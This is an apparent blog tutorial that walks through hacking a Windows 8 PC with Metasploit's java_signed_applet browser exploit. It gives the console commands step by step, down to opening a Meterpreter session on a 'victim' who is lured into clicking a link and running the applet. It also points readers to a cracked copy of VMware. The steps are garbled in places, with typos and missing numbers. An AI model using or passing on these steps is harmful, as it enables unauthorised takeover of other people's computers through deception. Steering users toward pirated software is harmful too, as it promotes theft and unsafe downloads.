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How To Hack Windows 8 PC With Metasploit In 2 Mins

Today in this tutorial I am going to tell you haw can yo hack a PC running on windows 8 using Metasploi in 2mins.This tutorial is for educational purpose only.

The Things You Required To Hack A Windows 8 PC Are:-

1).Backtrack  Operating System (Latest Version)
 Download It From Here
2).Metasploit (Pre-Installed in backTrack)
(Pre-Installed in Metasploit)
4). VMWare (optional- If You want to run BackTrack on Windows) 
  Download It From Here Or Search My Blog 4 a Cracked Version To Save $$$$ 

So lets' Start.....

1). Start Backtrack in GUI mode. by typing start x

2). Open Terminal

3). Type msfconcole

4). Then Type msf: use exploit/multi/browser/java_signed_applet

[Image: 11660074.jpg]

5). To Show options Type msf: show options

[Image: 11660075.jpg]

6). After This You want set LHOST means Localhost. First check you Ip from network connections if you are doing this live check your isp ip address.

To set LHOST Type msf: set LHOST eg.

[Image: 11660076.jpg]

7). Then you want to set LPORT means Port of localhost.

TYPE msf: set LPORT 80

[Image: 11660078.jpg]

9.) Then Set URIPATH.

Type msf: set URIPATH /

[Image: 11660080.jpg]

Now Everything is Set.

Now Type msf : exploit 

[Image: 11660116.jpg]

After This Go to victim Machine Or give him your ip address. (like this:

[Image: 11660117.jpg]

When He/she open your link he/she see this massage on screen click On RUN and you can see in bt Session is opened

[Image: 11660119.jpg]

To See sessions type msf: sessions -i

[Image: 11660120.jpg]

To Open Meterpreter type msf: sessions -i 1 (1 is session id)

[Image: 11660126.jpg]

[Image: 11660127.jpg]

There you go Windows 8 is hacked you have granted all rights.
If you like the tutorial then please reply here 

Do you have a tip to add? Let us know in the comments. 

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